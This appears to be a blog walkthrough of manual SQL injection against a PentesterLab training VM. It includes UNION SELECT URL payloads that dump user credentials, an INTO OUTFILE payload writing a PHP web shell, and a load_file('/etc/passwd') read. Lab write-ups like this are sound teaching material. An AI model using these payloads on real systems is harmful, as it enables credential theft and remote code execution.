Identifying SQLi
Often, we start by inserting a ' in any user input fields we can find, if we are lucky, the server will display some errors, this means we have broken the SQL statement used to display the results.
The above diagram displays an SQL error indicating 2 single quotes, despite we added only 1. This usually means there is already a single quote used for the statement, a peak at the backend code looks like:
Lets proceed with enumeration of the SQL table.
Enumerate SQLi
This is where we must first find out how many columns the table has, we can do this by using the UNION SELECT statement. We need to match the number of columns with the query used. If you used sqlmap, this is what it automates for you :-)
So, by inserting the following statements:
http://192.168.52.141/cat.php?id=2 union select 1
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3
will return an error...
http://192.168.52.141/cat.php?id=2 union select 1,2,3,4
no error returned....see diagram below:
Code Exec
Now we can start rocking! Let's see what version, database and user MySQL is running. We can call MySQL built in functions such as @@version, database(), current_user().
Looks like it's running Debian Squeeze, now let's see the database name the contents are stored in:
Great! The db name is photoblog. Now, how aboout the userid mysqld is running:
http://192.168.52.141/cat.php?id=2 union select 1,table_name,3,4 from information_schema.tables
will return a complete set of tables in photoblog db:
The table 'users' is of particular interest to us :-) Let's see what we can find inside it by displaying the corresponding tablename:column name in each row using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(table_name,':',column_name),3,4 from information_schema.columns
Output:
Scrolling down the displayed output, the most obvious goodies are inside the 'users' table column 'login' and 'password'. Let's exfiltrate it using this statement:
http://192.168.52.141/cat.php?id=2 union select 1,concat(login,':',password),3,4 from users
Output:
Now we have exfiltrate the user 'admin with password '8efe310f9ab3efeae8d410a8e0166eb2'. Stick it inside your favourite password cracker and you for the admin password!
There you go folks...tools such as sqlmap can also spawn a shell, what it does is it writes a php file to the www root with simple php system call such as:
http://192.168.52.141/cat.php?id=2 union select 1,"<? system($_GET["cmd"]); ?>",3,4 INTO OUTFILE '/var/www/cmd.php'
Provided the userid 'pentesterlab@localhost' had privilege to write to /var/www/ you should be able to call the url directly to pass arguments. You can also try load_file('/etc/passwd'). If you are lucky, you should be able to see its contents.
That's pretty much how SQLi is done by hand. Remember, don't be a script kiddie, always understand how your code works!
Kudos, to www.pentesterlab.com for the educational content.
No comments:
Post a Comment